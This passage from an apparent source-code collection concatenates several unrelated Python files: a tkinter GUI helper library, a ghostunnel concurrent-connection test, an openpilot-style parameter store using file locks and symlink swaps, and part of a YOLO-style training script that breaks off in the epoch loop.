print(f'Cannot locate {bitmap}! If using PyInstaller, be sure to specify this file in "datas".')
def create(self, force_row=False) -> None:
'''
Positions GUI elements in window.
May be called recursively by child Sections as elements are positioned.
'''
for child in {**self.widgets, **self.sections}.values():
try:
child.create(force_row) # if child is another Section object
except AttributeError:
child.position(force_row) # if child is a Widget object
self.created = True
def add_menu(self,
commands={'File': lambda: print('File button'), 'Edit': lambda: print('Edit button')},
cascades={'Options': {'Option 1': lambda: print('Option 1'), 'Option 2': lambda: print('Option 2')}}) -> None:
'''
Add a Menu to the top of the root window.
'''
self.menu = tk.Menu(self)
for label, cmd in commands.items():
self.menu.add_command(label=label, command=cmd)
for cascade, c_commands in cascades.items():
cascade_menu = tk.Menu(self.menu, tearoff=0)
for label, cmd in c_commands.items():
cascade_menu.add_command(label=label, command=cmd)
self.menu.add_cascade(label=cascade, menu=cascade_menu)
self.config(menu=self.menu)
def __repr__(self):
return 'Main EasyGUI Application'
def popup(self, *args, **kwargs):
'''
Returns a context manager for generating a popup window. Example usage:
with self.popup() as popup:
popup.add_widget('lbl', 'Test1')
popup.add_widget('btn', 'Test Button', command_func=lambda *args: print('Test Button clicked'))
'''
return PopUp(*args, **kwargs)
class PopUp(tk.Toplevel, GridMaster, SectionMaster):
'''
Basically a mini EasyGUI class that inherits from tk.Toplevel instead of tk.Tk.
Re-implements basic methods of EasyGUI class so widgets can be added.
'''
def __init__(self, *args, width: int=300, height: int=180, x: int=120, y: int=80, **kwargs):
if kwargs.get('tooltip', False):
super().__init__()
GridMaster.__init__(self)
SectionMaster.__init__(self)
self.wm_attributes('-disabled', True) # disables window interaction for click pass through
self.wm_overrideredirect(True) # removes window
self.wm_attributes('-alpha', 0.8)
self.geometry(f'{width}x{height}+{x}+{y}') # format of "WIDTHxHEIGHT+(-)XPOSITION+(-)YPOSITION"
self.style = EasyGUI.style
self.style.create_font()
self.configure(bg=self.style.tooltip_color)
else:
super().__init__()
GridMaster.__init__(self)
SectionMaster.__init__(self)
self.icon(bitmap=os.path.join(os.path.dirname(__file__), 'resources', 'transparent.ico'), default=True)
self.geometry(f'{width}x{height}+{x}+{y}') # format of "WIDTHxHEIGHT+(-)XPOSITION+(-)YPOSITION"
self.style = EasyGUI.style
self.style.create_font()
def __enter__(self):
self.created = False
return self
def __exit__(self, *args):
self.create()
@property
def root(self):
'''Used by downstream elements to reference EasyGUI as root'''
return self
def icon(self, bitmap, default: bool=False) -> None:
'''
Alternate method to call tk.Tk iconbitmap method using altered path handling
so that PyInstaller can package application with specified .ico file.
If not default, warning message is printed on failing to locate .ico file.
'''
try:
super().iconbitmap(bitmap=resource_path(bitmap))
except _tkinter.TclError:
if default:
pass # Pass silently if default .ico not found occurs when using PyInstaller and not adding transparent.ico to "datas"
else:
print(f'Cannot locate {bitmap}! If using PyInstaller, be sure to specify this file in "datas".')
def create(self, force_row=False) -> None:
'''Copied from EasyGUI.create'''
for name, section in self.sections.items():
section.create(force_row=force_row)
self.created = True
@recreate_if_needed
def add_widget(self, *args, **kwargs):
'''Copied from EasyGUI.add_widget'''
if '_default' not in self.sections:
self.add_section('_default')
return self.sections['_default'].add_widget(*args, **kwargs)
def __repr__(self):
return 'EasyGUI PopUp Window'
class Section(tk.Frame, GridMaster, SectionMaster):
'''
A Section is a tk.Frame used for storing and managing widgets.
Sections exist as children of the root (EasyGUI) window or other Sections.
'''
def __init__(self, parent=None, name='', title=False, grid_area=None,
tabbed: bool=False, equal_button_width: bool=False, **kwargs) -> None:
borderwidth = kwargs.get('borderwidth', 1)
relief = kwargs.get('relief', 'ridge')
if relief != 'ridge' and not borderwidth:
borderwidth = 1
self.tabbed = tabbed
super().__init__(master=parent,
bg=EasyGUI.style.section_color,
padx=EasyGUI.style.frame_padx,
pady=EasyGUI.style.frame_pady,
borderwidth=borderwidth,
relief=relief)
GridMaster.__init__(self)
SectionMaster.__init__(self)
self.parent = parent
self.name = name
self.grid_area = grid_area
if tabbed:
self.tabs = ttk.Notebook(self)
self.tabs.style = self.style
self.tabs.root = self.root
self.equal_button_width = equal_button_width
if title: # title kwargs can be provided as True or a string
if isinstance(title, str): # if string, use title for label text
self.add_widget(type='label', text=title)
elif title == True: # if True, use the name as the label text
self.add_widget(type='label', text=name)
@property
def style(self):
'''Goes upsteam to evenually reference EasyGUI.style'''
return self.parent.style
@property
def root(self):
'''Goes upsteam to evenually reference EasyGUI as root'''
return self.parent.root
def create(self, force_row: bool=False):
'''
Positions this section within the parent along with
positioning all children (Sections and/or Widgets).
'''
self.position(force_row)
if self.equal_button_width:
self.match_child_button_widths()
for child in {**self.widgets, **self.sections}.values():
try:
child.create(force_row) # if child is another Section object
except AttributeError:
child.position(force_row) # if child is a Widget object
def match_child_button_widths(self):
child_buttons = [child for child in self.widgets.values() if isinstance(child, widgets.Button)]
if len(child_buttons) > 1:
max_width = int(round(max(child.width / 7.0 for child in child_buttons if not child.image)))
for child in child_buttons:
if not child.image:
child.config(width=max_width)
def position(self, force_row: bool=False) -> None:
'''
Physically position this Section within its parent container.
'''
try:
if hasattr(self.parent, 'grid_areas'):
if self.parent.grid_areas != {} and self.grid_area and not force_row:
try:
if not hasattr(self.parent, 'tabbed') or not self.parent.tabbed:
bounds = self.parent.grid_areas[self.grid_area]
self.grid(row=bounds['first_row'], column=bounds['first_column'], rowspan=bounds['last_row']-bounds['first_row']+1, columnspan=bounds['last_column']-bounds['first_column']+1, sticky='NSEW')
else:
self.pack()
if self.tabbed:
self.tabs.pack()
return # early return if everything works fine with initial attempt (no other actions needed)
except KeyError:
if self.grid_area != self.name: # basically, if user-specified grid_area (are same if programatically set grid_area)
print(f'"{self.grid_area}" not found in parent\'s grid areas.\nResorting to a new row.')
self.parent.add_grid_row(self.name)
self.grid_area = self.name
self.parent.create()
except _tkinter.TclError:
print(f'\n--- GRID FAILED for Section: "{self.name}" ---\nTry ensuring "grid_area" arg is given for all Sections in a given parent.\nAdding to a new row instead.')
self.parent.create(force_row=True) # go back and fully recreate section forcing all children to be packed/in new rows
@property
def width(self) -> float:
'''
Estimate and return width desired by this Section.
'''
return float(max(widget.width for widget in self.widgets.values()))
@property
def height(self) -> float:
'''
Estimate and return height desired by this Section.
'''
return float(sum(widget.height for widget in self.widgets.values()))
def __repr__(self) -> str:
return f'Section: "{self.name}"'
def resource_path(relative_path):
'''Get absolute path to resource to allow PyInstaller bundling.'''
try:
base_path = sys._MEIPASS # PyInstaller-created temporary folder
except:
base_path = os.path.abspath('.')
return os.path.join(base_path, relative_path)
|
test-client-concurrent-connections.py
|
#!/usr/bin/env python3
# Creates a ghostunnel. Ensures that multiple servers can communicate.
from subprocess import Popen
from multiprocessing import Process
from common import *
import socket, ssl, time, random
def send_data(i, p):
counter = 0
while counter < 100:
r = random.random()
if r < 0.4:
time.sleep(r)
continue
counter+=1
if r < 0.7:
p.validate_can_send_from_client("blah blah blah", "{0}:{1} client -> server".format(i, counter))
else:
p.validate_can_send_from_server("blah blah blah", "{0}:{1} server -> client".format(i, counter))
r = random.random()
if r < 0.5:
p.validate_closing_client_closes_server("{0} client close -> server close".format(i))
else:
p.validate_closing_server_closes_client("{0} server close -> client close".format(i))
if __name__ == "__main__":
ghostunnel = None
n_clients = 10
try:
# create certs
root = RootCert('root')
root.create_signed_cert('client')
for i in range(1, n_clients):
root.create_signed_cert("server{0}".format(i))
# start ghostunnel
ghostunnel = run_ghostunnel(['client', '--listen={0}:13001'.format(LOCALHOST),
'--target={0}:13002'.format(LOCALHOST), '--keystore=client.p12',
'--status={0}:{1}'.format(LOCALHOST, STATUS_PORT),
'--cacert=root.crt'])
# servers should be able to communicate all at the same time.
proc = []
for i in range(1, n_clients):
pair = SocketPair(TcpClient(13001), TlsServer("server{0}".format(i), 'root', 13002))
p = Process(target=send_data, args=(i,pair,))
p.start()
proc.append(p)
for p in proc:
p.join()
print_ok("OK")
finally:
terminate(ghostunnel)
|
params.py
|
#!/usr/bin/env python3
"""ROS has a parameter server, we have files.
The parameter store is a persistent key value store, implemented as a directory with a writer lock.
On Android, we store params under params_dir = /data/params. The writer lock is a file
"<params_dir>/.lock" taken using flock(), and data is stored in a directory symlinked to by
"<params_dir>/d".
Each key, value pair is stored as a file with named <key> with contents <value>, located in
<params_dir>/d/<key>
Readers of a single key can just open("<params_dir>/d/<key>") and read the file contents.
Readers who want a consistent snapshot of multiple keys should take the lock.
Writers should take the lock before modifying anything. Writers should also leave the DB in a
consistent state after a crash. The implementation below does this by copying all params to a temp
directory <params_dir>/<tmp>, then atomically symlinking <params_dir>/<d> to <params_dir>/<tmp>
before deleting the old <params_dir>/<d> directory.
Writers that only modify a single key can simply take the lock, then swap the corresponding value
file in place without messing with <params_dir>/d.
"""
import time
import os
import errno
import shutil
import fcntl
import tempfile
import threading
from enum import Enum
from common.basedir import PARAMS
def mkdirs_exists_ok(path):
try:
os.makedirs(path)
except OSError:
if not os.path.isdir(path):
raise
class TxType(Enum):
PERSISTENT = 1
CLEAR_ON_MANAGER_START = 2
CLEAR_ON_PANDA_DISCONNECT = 3
class UnknownKeyName(Exception):
pass
keys = {
"AccessToken": [TxType.CLEAR_ON_MANAGER_START],
"AthenadPid": [TxType.PERSISTENT],
"CachedFingerprint": [TxType.CLEAR_ON_PANDA_DISCONNECT],
"CalibrationParams": [TxType.PERSISTENT],
"CarBatteryCapacity": [TxType.PERSISTENT],
"CarParams": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarParamsCache": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarVin": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CommunityFeaturesToggle": [TxType.PERSISTENT],
"CompletedTrainingVersion": [TxType.PERSISTENT],
"DisablePowerDown": [TxType.PERSISTENT],
"DisablePowerDownTime": [TxType.PERSISTENT],
"DisableUpdates": [TxType.PERSISTENT],
"DistanceTraveled": [TxType.PERSISTENT],
"DistanceTraveledEngaged": [TxType.PERSISTENT],
"DistanceTraveledOverride": [TxType.PERSISTENT],
"DoUninstall": [TxType.CLEAR_ON_MANAGER_START],
"DongleId": [TxType.PERSISTENT],
"GitBranch": [TxType.PERSISTENT],
"GitCommit": [TxType.PERSISTENT],
"GitRemote": [TxType.PERSISTENT],
"GithubSshKeys": [TxType.PERSISTENT],
"HandsOnWheelMonitoring": [TxType.PERSISTENT],
"HasAcceptedTerms": [TxType.PERSISTENT],
"HasCompletedSetup": [TxType.PERSISTENT],
"IsDriverViewEnabled": [TxType.CLEAR_ON_MANAGER_START],
"IsLdwEnabled": [TxType.PERSISTENT],
"IsGeofenceEnabled": [TxType.PERSISTENT],
"IsMetric": [TxType.PERSISTENT],
"IsOffroad": [TxType.CLEAR_ON_MANAGER_START],
"IsRHD": [TxType.PERSISTENT],
"IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
"IsUpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"IsUploadRawEnabled": [TxType.PERSISTENT],
"LastAthenaPingTime": [TxType.PERSISTENT],
"LastUpdateTime": [TxType.PERSISTENT],
"LastUpdateException": [TxType.PERSISTENT],
"LimitSetSpeed": [TxType.PERSISTENT],
"LimitSetSpeedNeural": [TxType.PERSISTENT],
"LiveParameters": [TxType.PERSISTENT],
"LongitudinalControl": [TxType.PERSISTENT],
"OpenpilotEnabledToggle": [TxType.PERSISTENT],
"VisionRadarToggle": [TxType.PERSISTENT],
"LaneChangeEnabled": [TxType.PERSISTENT],
"PandaFirmware": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaFirmwareHex": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaDongleId": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Passive": [TxType.PERSISTENT],
"RecordFront": [TxType.PERSISTENT],
"ReleaseNotes": [TxType.PERSISTENT],
"ShouldDoUpdate": [TxType.CLEAR_ON_MANAGER_START],
"SpeedLimitOffset": [TxType.PERSISTENT],
"SubscriberInfo": [TxType.PERSISTENT],
"TermsVersion": [TxType.PERSISTENT],
"TrainingVersion": [TxType.PERSISTENT],
"UpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"UpdateFailedCount": [TxType.CLEAR_ON_MANAGER_START],
"Version": [TxType.PERSISTENT],
"Offroad_ChargeDisabled": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_ConnectivityNeeded": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_ConnectivityNeededPrompt": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_TemperatureTooHigh": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_PandaFirmwareMismatch": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_InvalidTime": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_NeosUpdate": [TxType.CLEAR_ON_MANAGER_START],
"DevBBUI": [TxType.PERSISTENT],
"Offroad_UpdateFailed": [TxType.CLEAR_ON_MANAGER_START],
}
def fsync_dir(path):
fd = os.open(path, os.O_RDONLY)
try:
os.fsync(fd)
finally:
os.close(fd)
class FileLock():
def __init__(self, path, create, lock_ex):
self._path = path
self._create = create
self._fd = None
self._lock_ex = lock_ex
def acquire(self):
self._fd = os.open(self._path, os.O_CREAT if self._create else 0)
fcntl.flock(self._fd, fcntl.LOCK_EX if self._lock_ex else fcntl.LOCK_SH)
def release(self):
if self._fd is not None:
os.close(self._fd)
self._fd = None
class DBAccessor():
def __init__(self, path):
self._path = path
self._vals = None
def keys(self):
self._check_entered()
return self._vals.keys()
def get(self, key):
self._check_entered()
if self._vals is None:
return None
try:
return self._vals[key]
except KeyError:
return None
def _get_lock(self, create, lock_ex):
lock = FileLock(os.path.join(self._path, ".lock"), create, lock_ex)
lock.acquire()
return lock
def _read_values_locked(self):
"""Callers should hold a lock while calling this method."""
vals = {}
try:
data_path = self._data_path()
keys = os.listdir(data_path)
for key in keys:
with open(os.path.join(data_path, key), "rb") as f:
vals[key] = f.read()
except (OSError, IOError) as e:
# Either the DB hasn't been created yet, or somebody wrote a bug and left the DB in an
# inconsistent state. Either way, return empty.
if e.errno == errno.ENOENT:
return {}
return vals
def _data_path(self):
return os.path.join(self._path, "d")
def _check_entered(self):
if self._vals is None:
raise Exception("Must call __enter__ before using DB")
class DBReader(DBAccessor):
def __enter__(self):
try:
lock = self._get_lock(False, False)
except OSError as e:
# Do not create lock if it does not exist.
if e.errno == errno.ENOENT:
self._vals = {}
return self
try:
# Read everything.
self._vals = self._read_values_locked()
return self
finally:
lock.release()
def __exit__(self, exc_type, exc_value, traceback):
pass
class DBWriter(DBAccessor):
def __init__(self, path):
super(DBWriter, self).__init__(path)
self._lock = None
self._prev_umask = None
def put(self, key, value):
self._vals[key] = value
def delete(self, key):
self._vals.pop(key, None)
def __enter__(self):
mkdirs_exists_ok(self._path)
# Make sure we can write and that permissions are correct.
self._prev_umask = os.umask(0)
try:
os.chmod(self._path, 0o777)
self._lock = self._get_lock(True, True)
self._vals = self._read_values_locked()
except Exception:
os.umask(self._prev_umask)
self._prev_umask = None
raise
return self
def __exit__(self, exc_type, exc_value, traceback):
self._check_entered()
try:
# data_path refers to the externally used path to the params. It is a symlink.
# old_data_path is the path currently pointed to by data_path.
# tempdir_path is a path where the new params will go, which the new data path will point to.
# new_data_path is a temporary symlink that will atomically overwrite data_path.
#
# The current situation is:
# data_path -> old_data_path
# We're going to write params data to tempdir_path
# tempdir_path -> params data
# Then point new_data_path to tempdir_path
# new_data_path -> tempdir_path
# Then atomically overwrite data_path with new_data_path
# data_path -> tempdir_path
old_data_path = None
new_data_path = None
tempdir_path = tempfile.mkdtemp(prefix=".tmp", dir=self._path)
try:
# Write back all keys.
os.chmod(tempdir_path, 0o777)
for k, v in self._vals.items():
with open(os.path.join(tempdir_path, k), "wb") as f:
f.write(v)
f.flush()
os.fsync(f.fileno())
fsync_dir(tempdir_path)
data_path = self._data_path()
try:
old_data_path = os.path.join(self._path, os.readlink(data_path))
except (OSError, IOError):
# NOTE(mgraczyk): If other DB implementations have bugs, this could cause
# copies to be left behind, but we still want to overwrite.
pass
new_data_path = "{}.link".format(tempdir_path)
os.symlink(os.path.basename(tempdir_path), new_data_path)
os.rename(new_data_path, data_path)
fsync_dir(self._path)
finally:
# If the rename worked, we can delete the old data. Otherwise delete the new one.
success = new_data_path is not None and os.path.exists(data_path) and (
os.readlink(data_path) == os.path.basename(tempdir_path))
if success:
if old_data_path is not None:
shutil.rmtree(old_data_path)
else:
shutil.rmtree(tempdir_path)
# Regardless of what happened above, there should be no link at new_data_path.
if new_data_path is not None and os.path.islink(new_data_path):
os.remove(new_data_path)
finally:
os.umask(self._prev_umask)
self._prev_umask = None
# Always release the lock.
self._lock.release()
self._lock = None
def read_db(params_path, key):
path = "%s/d/%s" % (params_path, key)
try:
with open(path, "rb") as f:
return f.read()
except IOError:
return None
def write_db(params_path, key, value):
if isinstance(value, str):
value = value.encode('utf8')
prev_umask = os.umask(0)
lock = FileLock(params_path + "/.lock", True, True)
lock.acquire()
try:
tmp_path = tempfile.NamedTemporaryFile(mode="wb", prefix=".tmp", dir=params_path, delete=False)
with tmp_path as f:
f.write(value)
f.flush()
os.fsync(f.fileno())
os.chmod(tmp_path.name, 0o666)
path = "%s/d/%s" % (params_path, key)
os.rename(tmp_path.name, path)
fsync_dir(os.path.dirname(path))
finally:
os.umask(prev_umask)
lock.release()
class Params():
def __init__(self, db=PARAMS):
self.db = db
# create the database if it doesn't exist...
if not os.path.exists(self.db + "/d"):
with self.transaction(write=True):
pass
def clear_all(self):
shutil.rmtree(self.db, ignore_errors=True)
with self.transaction(write=True):
pass
def transaction(self, write=False):
if write:
return DBWriter(self.db)
else:
return DBReader(self.db)
def _clear_keys_with_type(self, tx_type):
with self.transaction(write=True) as txn:
for key in keys:
if tx_type in keys[key]:
txn.delete(key)
def manager_start(self):
self._clear_keys_with_type(TxType.CLEAR_ON_MANAGER_START)
def panda_disconnect(self):
self._clear_keys_with_type(TxType.CLEAR_ON_PANDA_DISCONNECT)
def delete(self, key):
with self.transaction(write=True) as txn:
txn.delete(key)
def get(self, key, block=False, encoding=None):
if key not in keys:
raise UnknownKeyName(key)
while 1:
ret = read_db(self.db, key)
if not block or ret is not None:
break
# is polling really the best we can do?
time.sleep(0.05)
if ret is not None and encoding is not None:
ret = ret.decode(encoding)
return ret
def put(self, key, dat):
"""
Warning: This function blocks until the param is written to disk!
In very rare cases this can take over a second, and your code will hang.
Use the put_nonblocking helper function in time sensitive code, but
in general try to avoid writing params as much as possible.
"""
if key not in keys:
raise UnknownKeyName(key)
write_db(self.db, key, dat)
def put_nonblocking(key, val):
def f(key, val):
params = Params()
params.put(key, val)
t = threading.Thread(target=f, args=(key, val))
t.start()
return t
|
train.py
|
import argparse
import logging
import math
import os
import random
import time
from copy import deepcopy
from pathlib import Path
from threading import Thread
import numpy as np
import torch.distributed as dist
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.optim.lr_scheduler as lr_scheduler
import torch.utils.data
import yaml
from torch.cuda import amp
from torch.nn.parallel import DistributedDataParallel as DDP
from torch.utils.tensorboard import SummaryWriter
from tqdm import tqdm
import test # import test.py to get mAP after each epoch
from models.experimental import attempt_load
from models.yolo import Model
from utils.autoanchor import check_anchors
from utils.datasets import create_dataloader
from utils.general import labels_to_class_weights, increment_path, labels_to_image_weights, init_seeds, \
fitness, strip_optimizer, get_latest_run, check_dataset, check_file, check_git_status, check_img_size, \
check_requirements, print_mutation, set_logging, one_cycle, colorstr
from utils.google_utils import attempt_download
from utils.loss import ComputeLoss
from utils.plots import plot_images, plot_labels, plot_results, plot_evolution
from utils.torch_utils import ModelEMA, select_device, intersect_dicts, torch_distributed_zero_first, is_parallel
from utils.wandb_logging.wandb_utils import WandbLogger, check_wandb_resume
logger = logging.getLogger(__name__)
def train(hyp, opt, device, tb_writer=None):
logger.info(colorstr('hyperparameters: ') + ', '.join(f'{k}={v}' for k, v in hyp.items()))
save_dir, epochs, batch_size, total_batch_size, weights, rank = \
Path(opt.save_dir), opt.epochs, opt.batch_size, opt.total_batch_size, opt.weights, opt.global_rank
# Directories
wdir = save_dir / 'weights'
wdir.mkdir(parents=True, exist_ok=True) # make dir
last = wdir / 'last.pt'
best = wdir / 'best.pt'
results_file = save_dir / 'results.txt'
# Save run settings
with open(save_dir / 'hyp.yaml', 'w') as f:
yaml.dump(hyp, f, sort_keys=False)
with open(save_dir / 'opt.yaml', 'w') as f:
yaml.dump(vars(opt), f, sort_keys=False)
# Configure
plots = not opt.evolve # create plots
cuda = device.type != 'cpu'
init_seeds(2 + rank)
with open(opt.data) as f:
data_dict = yaml.load(f, Loader=yaml.SafeLoader) # data dict
is_coco = opt.data.endswith('coco.yaml')
# Logging- Doing this before checking the dataset. Might update data_dict
loggers = {'wandb': None} # loggers dict
if rank in [-1, 0]:
opt.hyp = hyp # add hyperparameters
run_id = torch.load(weights).get('wandb_id') if weights.endswith('.pt') and os.path.isfile(weights) else None
wandb_logger = WandbLogger(opt, Path(opt.save_dir).stem, run_id, data_dict)
loggers['wandb'] = wandb_logger.wandb
data_dict = wandb_logger.data_dict
if wandb_logger.wandb:
weights, epochs, hyp = opt.weights, opt.epochs, opt.hyp # WandbLogger might update weights, epochs if resuming
nc = 1 if opt.single_cls else int(data_dict['nc']) # number of classes
names = ['item'] if opt.single_cls and len(data_dict['names']) != 1 else data_dict['names'] # class names
assert len(names) == nc, '%g names found for nc=%g dataset in %s' % (len(names), nc, opt.data) # check
# Model
pretrained = weights.endswith('.pt')
if pretrained:
with torch_distributed_zero_first(rank):
attempt_download(weights) # download if not found locally
ckpt = torch.load(weights, map_location=device) # load checkpoint
model = Model(opt.cfg or ckpt['model'].yaml, ch=3, nc=nc, anchors=hyp.get('anchors')).to(device) # create
exclude = ['anchor'] if (opt.cfg or hyp.get('anchors')) and not opt.resume else [] # exclude keys
state_dict = ckpt['model'].float().state_dict() # to FP32
state_dict = intersect_dicts(state_dict, model.state_dict(), exclude=exclude) # intersect
model.load_state_dict(state_dict, strict=False) # load
logger.info('Transferred %g/%g items from %s' % (len(state_dict), len(model.state_dict()), weights)) # report
else:
model = Model(opt.cfg, ch=3, nc=nc, anchors=hyp.get('anchors')).to(device) # create
with torch_distributed_zero_first(rank):
check_dataset(data_dict) # check
train_path = data_dict['train']
test_path = data_dict['val']
# Freeze
freeze = [] # parameter names to freeze (full or partial)
for k, v in model.named_parameters():
v.requires_grad = True # train all layers
if any(x in k for x in freeze):
print('freezing %s' % k)
v.requires_grad = False
# Optimizer
nbs = 64 # nominal batch size
accumulate = max(round(nbs / total_batch_size), 1) # accumulate loss before optimizing
hyp['weight_decay'] *= total_batch_size * accumulate / nbs # scale weight_decay
logger.info(f"Scaled weight_decay = {hyp['weight_decay']}")
pg0, pg1, pg2 = [], [], [] # optimizer parameter groups
for k, v in model.named_modules():
if hasattr(v, 'bias') and isinstance(v.bias, nn.Parameter):
pg2.append(v.bias) # biases
if isinstance(v, nn.BatchNorm2d):
pg0.append(v.weight) # no decay
elif hasattr(v, 'weight') and isinstance(v.weight, nn.Parameter):
pg1.append(v.weight) # apply decay
if opt.adam:
optimizer = optim.Adam(pg0, lr=hyp['lr0'], betas=(hyp['momentum'], 0.999)) # adjust beta1 to momentum
else:
optimizer = optim.SGD(pg0, lr=hyp['lr0'], momentum=hyp['momentum'], nesterov=True)
optimizer.add_param_group({'params': pg1, 'weight_decay': hyp['weight_decay']}) # add pg1 with weight_decay
optimizer.add_param_group({'params': pg2}) # add pg2 (biases)
logger.info('Optimizer groups: %g .bias, %g conv.weight, %g other' % (len(pg2), len(pg1), len(pg0)))
del pg0, pg1, pg2
# Scheduler https://arxiv.org/pdf/1812.01187.pdf
# https://pytorch.org/docs/stable/_modules/torch/optim/lr_scheduler.html#OneCycleLR
if opt.linear_lr:
lf = lambda x: (1 - x / (epochs - 1)) * (1.0 - hyp['lrf']) + hyp['lrf'] # linear
else:
lf = one_cycle(1, hyp['lrf'], epochs) # cosine 1->hyp['lrf']
scheduler = lr_scheduler.LambdaLR(optimizer, lr_lambda=lf)
# plot_lr_scheduler(optimizer, scheduler, epochs)
# EMA
ema = ModelEMA(model) if rank in [-1, 0] else None
# Resume
start_epoch, best_fitness = 0, 0.0
if pretrained:
# Optimizer
if ckpt['optimizer'] is not None:
optimizer.load_state_dict(ckpt['optimizer'])
best_fitness = ckpt['best_fitness']
# EMA
if ema and ckpt.get('ema'):
ema.ema.load_state_dict(ckpt['ema'].float().state_dict())
ema.updates = ckpt['updates']
# Results
if ckpt.get('training_results') is not None:
results_file.write_text(ckpt['training_results']) # write results.txt
# Epochs
start_epoch = ckpt['epoch'] + 1
if opt.resume:
assert start_epoch > 0, '%s training to %g epochs is finished, nothing to resume.' % (weights, epochs)
if epochs < start_epoch:
logger.info('%s has been trained for %g epochs. Fine-tuning for %g additional epochs.' %
(weights, ckpt['epoch'], epochs))
epochs += ckpt['epoch'] # finetune additional epochs
del ckpt, state_dict
# Image sizes
gs = max(int(model.stride.max()), 32) # grid size (max stride)
nl = model.model[-1].nl # number of detection layers (used for scaling hyp['obj'])
imgsz, imgsz_test = [check_img_size(x, gs) for x in opt.img_size] # verify imgsz are gs-multiples
# DP mode
if cuda and rank == -1 and torch.cuda.device_count() > 1:
model = torch.nn.DataParallel(model)
# SyncBatchNorm
if opt.sync_bn and cuda and rank != -1:
model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model).to(device)
logger.info('Using SyncBatchNorm()')
# Trainloader
dataloader, dataset = create_dataloader(train_path, imgsz, batch_size, gs, opt,
hyp=hyp, augment=True, cache=opt.cache_images, rect=opt.rect, rank=rank,
world_size=opt.world_size, workers=opt.workers,
image_weights=opt.image_weights, quad=opt.quad, prefix=colorstr('train: '))
mlc = np.concatenate(dataset.labels, 0)[:, 0].max() # max label class
nb = len(dataloader) # number of batches
assert mlc < nc, 'Label class %g exceeds nc=%g in %s. Possible class labels are 0-%g' % (mlc, nc, opt.data, nc - 1)
# Process 0
if rank in [-1, 0]:
testloader = create_dataloader(test_path, imgsz_test, batch_size * 2, gs, opt, # testloader
hyp=hyp, cache=opt.cache_images and not opt.notest, rect=True, rank=-1,
world_size=opt.world_size, workers=opt.workers,
pad=0.5, prefix=colorstr('val: '))[0]
if not opt.resume:
labels = np.concatenate(dataset.labels, 0)
c = torch.tensor(labels[:, 0]) # classes
# cf = torch.bincount(c.long(), minlength=nc) + 1. # frequency
# model._initialize_biases(cf.to(device))
if plots:
plot_labels(labels, names, save_dir, loggers)
if tb_writer:
tb_writer.add_histogram('classes', c, 0)
# Anchors
if not opt.noautoanchor:
check_anchors(dataset, model=model, thr=hyp['anchor_t'], imgsz=imgsz)
model.half().float() # pre-reduce anchor precision
# DDP mode
if cuda and rank != -1:
model = DDP(model, device_ids=[opt.local_rank], output_device=opt.local_rank,
# nn.MultiheadAttention incompatibility with DDP https://github.com/pytorch/pytorch/issues/26698
find_unused_parameters=any(isinstance(layer, nn.MultiheadAttention) for layer in model.modules()))
# Model parameters
hyp['box'] *= 3. / nl # scale to layers
hyp['cls'] *= nc / 80. * 3. / nl # scale to classes and layers
hyp['obj'] *= (imgsz / 640) ** 2 * 3. / nl # scale to image size and layers
hyp['label_smoothing'] = opt.label_smoothing
model.nc = nc # attach number of classes to model
model.hyp = hyp # attach hyperparameters to model
model.gr = 1.0 # iou loss ratio (obj_loss = 1.0 or iou)
model.class_weights = labels_to_class_weights(dataset.labels, nc).to(device) * nc # attach class weights
model.names = names
# Start training
t0 = time.time()
nw = max(round(hyp['warmup_epochs'] * nb), 1000) # number of warmup iterations, max(3 epochs, 1k iterations)
# nw = min(nw, (epochs - start_epoch) / 2 * nb) # limit warmup to < 1/2 of training
maps = np.zeros(nc) # mAP per class
results = (0, 0, 0, 0, 0, 0, 0) # P, R, mAP@.5, mAP@.5-.95, val_loss(box, obj, cls)
scheduler.last_epoch = start_epoch - 1 # do not move
scaler = amp.GradScaler(enabled=cuda)
compute_loss = ComputeLoss(model) # init loss class
logger.info(f'Image sizes {imgsz} train, {imgsz_test} test\n'
f'Using {dataloader.num_workers} dataloader workers\n'
f'Logging results to {save_dir}\n'
f'Starting training for {epochs} epochs...')
for epoch in range(start_epoch, epochs): # epoch ------------------------------------------------------------------
model.train()
# Update image weights (optional)
if opt.image_weights:
# Generate indices
if rank in [-1, 0]:
cw = model.class_weights.cpu().numpy() * (1 - maps) ** 2 / nc # class weights
iw = labels_to_image_weights(dataset.labels, nc=nc, class_weights=cw) # image weights
dataset.indices = random.choices(range(dataset.n), weights=iw, k=dataset.n) # rand weighted idx
# Broadcast if DDP
if rank != -1:
indices = (torch.tensor(dataset.indices) if rank == 0 else torch.zeros(dataset.n)).int()
dist.broadcast(indices, 0)
if rank != 0:
dataset.indices = indices.cpu().numpy()
# Update mosaic border
# b = int(random.uniform(0.25 * imgsz, 0.75 * imgsz + gs) // gs * gs)
# dataset.mosaic_border = [b - imgsz, -b] # height, width borders
mloss = torch.zeros(4, device=device) # mean losses
if rank != -1:
dataloader.sampler.set_epoch(epoch)
pbar = enumerate(dataloader)
logger.info(('\n' + '%10s' * 8) % ('Epoch', 'gpu_mem', 'box', 'obj', 'cls', 'total', 'labels', 'img_size'))
if rank in [-1, 0]:
pbar = tqdm(pbar, total=nb) # progress bar
optimizer.zero_grad()
